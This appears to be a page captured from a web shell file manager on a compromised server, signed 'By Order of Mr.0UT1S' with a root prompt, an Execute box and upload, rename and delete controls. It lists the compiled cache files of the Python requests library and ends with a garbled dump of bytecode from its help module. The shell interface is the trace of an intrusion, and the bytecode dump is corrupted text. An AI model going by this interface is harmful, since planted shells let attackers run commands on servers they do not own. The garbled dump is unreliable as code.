opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
requests
/
__pycache__
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
__init__.cpython-312.pyc
5.26 KB
Rename
Delete
__version__.cpython-312.pyc
554 bytes
Rename
Delete
_internal_utils.cpython-312.pyc
1.95 KB
Rename
Delete
adapters.cpython-312.pyc
27.66 KB
Rename
Delete
api.cpython-312.pyc
6.99 KB
Rename
Delete
auth.cpython-312.pyc
13.57 KB
Rename
Delete
certs.cpython-312.pyc
636 bytes
Rename
Delete
compat.cpython-312.pyc
2.00 KB
Rename
Delete
cookies.cpython-312.pyc
24.58 KB
Rename
Delete
exceptions.cpython-312.pyc
7.38 KB
Rename
Delete
help.cpython-312.pyc
4.20 KB
Rename
Delete
hooks.cpython-312.pyc
1021 bytes
Rename
Delete
models.cpython-312.pyc
34.50 KB
Rename
Delete
packages.cpython-312.pyc
1.06 KB
Rename
Delete
sessions.cpython-312.pyc
27.16 KB
Rename
Delete
status_codes.cpython-312.pyc
5.85 KB
Rename
Delete
structures.cpython-312.pyc
5.46 KB
Rename
Delete
utils.cpython-312.pyc
35.47 KB
Rename
Delete
� (��g# � � � d Z ddlZddlZddlZddlZddlZddlZddlmZ ddl Z ddlZ ddl mZ ddlZddlZd� Zd� Zd� Zed k( r e� yy# e$ r dZ Y �4w xY w# e$ r dZY �<w xY w# e$ r dZdZdZY �>w xY w) z'Module containing bug report helper(s).� N� )�__version__)� pyopensslc �& � t j � } | dk( rt j � }n�| dk( r�dj t j j t j j t j j � }t j j dk7 rbdj |t j j g� }n6| dk( rt j � }n| dk( rt j � }nd}| |d �S ) a� Return a dict with the Python implementation and version. Provide both the name and the version of the Python implementation currently running. For example, on CPython 3.10.3 it will return {'name': 'CPython', 'version': '3.10.3'}. This function works best on CPython and PyPy: in particular, it probably doesn't work for Jython or IronPython. Future investigation should be done to work out the correct shape of the code for those platforms. �CPython�PyPyz{}.{}.{}�final� �Jython� IronPython�Unknown)�name�version)�platform�python_implementation�python_version�format�sys�pypy_version_info�major�minor�micro�releaselevel�join)�implementation�implementation_versions �</opt/hc_python/lib/python3.12/site-packages/requests/help.py�_implementationr "